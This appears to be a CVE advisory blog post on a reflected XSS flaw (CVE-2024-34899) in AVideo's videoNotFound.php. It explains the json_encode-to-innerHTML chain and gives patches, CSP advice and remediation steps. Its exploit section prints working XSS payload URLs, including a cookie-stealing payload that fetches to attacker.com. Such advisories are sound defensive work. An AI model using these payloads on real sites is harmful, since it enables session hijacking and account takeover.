AVideo, Reflected XSS, CVE-2024-34899 (High)

Listen to this Post

Technical Explanation of CVE-2024-34899

This reflected XSS vulnerability exists in AVideo’s `videoNotFound.php` file because unsanitized user input flows directly into JavaScript’s `innerHTML` sink. The attack begins when a victim clicks a crafted URL containing the `404ErrorMsg` parameter. The PHP script at `view/videoNotFound.php:49` uses `json_encode()` on this parameter, which only escapes quotes and backslashes—critically, it does not escape HTML angle brackets (< and >). The encoded string is then passed to the JavaScript function avideoAlertInfo(), which eventually calls avideoAlertHTMLText(). At view/js/script.js:1464, the function sets span.innerHTML = msg, where `msg` contains the unescaped HTML tags. When the browser renders this, it parses the HTML tags as real DOM elements. If an attacker injects <img src=x onerror=alert(1)>, the `onerror` handler executes arbitrary JavaScript in the victim’s browser context. This bypass occurs because `json_encode()` treats the output as JSON data, not HTML, while `innerHTML` interprets it as markup. The same vulnerable sink exists in four different alert functions within script.js, making this a systemic issue in AVideo’s JavaScript alert handling .

dailycve form

Platform: AVideo
Version: 12.4
Vulnerability: Reflected XSS
Severity: High
Date: May 15, 2024

Prediction: Patch already available

What Undercode Say

Analytics

The vulnerability was discovered by DanielnetoDotCom and published to the GitHub Advisory Database on May 19, 2024. The issue affects AVideo version 12.4 specifically . Multiple CVEs exist for AVideo XSS vulnerabilities across different versions (CVE-2023-48728 in 11.6, CVE-2024-34899 in 12.4, CVE-2025-53084 in 14.4), indicating recurring input sanitization problems . The root cause pattern is consistent: unsanitized user input flowing into JavaScript rendering functions .

Bash Commands and Codes

Test if AVideo instance is vulnerable
curl -s "https://target.com/view/videoNotFound.php?404ErrorMsg=<img src=x onerror=alert(document.domain)>" | grep -i "alert(document.domain)"
// Vulnerable code (view/videoNotFound.php line 49)
if (!empty($_REQUEST['404ErrorMsg'])) {
echo 'avideoAlertInfo(' . json_encode($_REQUEST['404ErrorMsg']) . ');';
}
// Fixed code (with JSON_HEX_TAG)
if (!empty($_REQUEST['404ErrorMsg'])) {
echo 'avideoAlertInfo(' . json_encode($_REQUEST['404ErrorMsg'], JSON_HEX_TAG | JSON_HEX_AMP) . ');';
}
// Vulnerable JavaScript sink (view/js/script.js line 1464)
span.innerHTML = msg; // Renders HTML tags, executes JavaScript
// Fixed version (using textContent)
span.textContent = msg; // Treats as plain text only
Enumerate all alert functions that use innerHTML
grep -r "innerHTML" view/js/script.js | grep -E "avideoAlert|avideoConfirm"
Content-Security-Policy header (defense in depth)
Content-Security-Policy: default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'

Exploit

https://victim-site.com/view/videoNotFound.php?404ErrorMsg=<img src=x onerror=alert(document.cookie)>

The payload flows through the chain: URL parameter → `json_encode()` (no HTML escaping) → `avideoAlertInfo()` → `avideoAlert()` → `avideoAlertHTMLText()` → span.innerHTML. The `onerror` event fires because `src=x` fails to load, executing `alert(document.cookie)` in the victim’s browser .

Advanced payload for session theft:


<

svg/onload=fetch('https://attacker.com/steal?cookie='+document.cookie)>

Protection from this CVE

Immediate remediation:

1. Apply the official patch from WWBN

  1. Replace all instances of `innerHTML` with `textContent` in alert functions
  2. Add `JSON_HEX_TAG | JSON_HEX_AMP` flags to all `json_encode()` calls handling user input

4. Implement Content-Security-Policy headers restricting script sources

Code-level fixes:

// Always escape HTML contexts properly
echo json_encode($user_input, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_QUOT | JSON_HEX_APOS);
// Never use innerHTML with user-controlled data
span.textContent = msg; // Safe alternative

Impact

  • Session hijacking: Attacker can steal `PHPSESSID` cookies (not HttpOnly by default)
  • Account takeover: Stolen sessions allow password changes and email modifications
  • Phishing: Malicious login forms injected via SweetAlert modal
  • Worm propagation: Self-spreading payloads via comments or messages
  • Admin compromise: Crafted links sent to administrators lead to full system control
  • Data exfiltration: Sensitive user information theft

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top